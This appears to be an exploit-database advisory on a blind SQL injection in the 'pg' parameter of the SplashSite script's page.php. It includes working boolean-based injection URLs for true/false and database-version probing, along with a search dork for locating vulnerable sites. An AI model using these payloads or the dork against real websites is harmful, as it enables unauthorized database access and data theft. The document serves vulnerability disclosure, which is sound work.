Blind SQL Injection in Creative SplashWorks-SplashSite

vendor:

SplashSite

by:

F.Hack

8,8

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: SplashSite

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Blind SQL Injection in Creative SplashWorks-SplashSite

The vulnerability exists in the Creative SplashWorks-SplashSite script, which allows an attacker to inject malicious SQL queries into the application. The attacker can use the 'pg' parameter in the page.php file to inject malicious SQL queries. For example, the attacker can use the 'pg=18+and+1=1' and 'pg=18+and+1=2' queries to check if the application is vulnerable to SQL injection. The attacker can also use the 'pg=18+and+substring(@@version,1,1)=5' and 'pg=18+and+substring(@@version,1,1)=4' queries to check the version of the database.

Mitigation:

Developers should ensure that all user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

####################################################################
.:. Email : F.Hack@w.cn
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Creative SplashWorks-SplashSite
.:. Language : php
.:. Bug Type : Blind Sql Injection
.:. Dork : "Website Powered By Creative SplashWorks - SplashSite"
####################################################################

===[ Exploit ]===

www.site.com/page.php?pg=18+and+1=1 >>> True
www.site.com/page.php?pg=18+and+1=2 >>> False

www.site.com/page.php?pg=18+and+substring(@@version,1,1)=5 >>> True
www.site.com/page.php?pg=18+and+substring(@@version,1,1)=4 >>> False


####################################################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack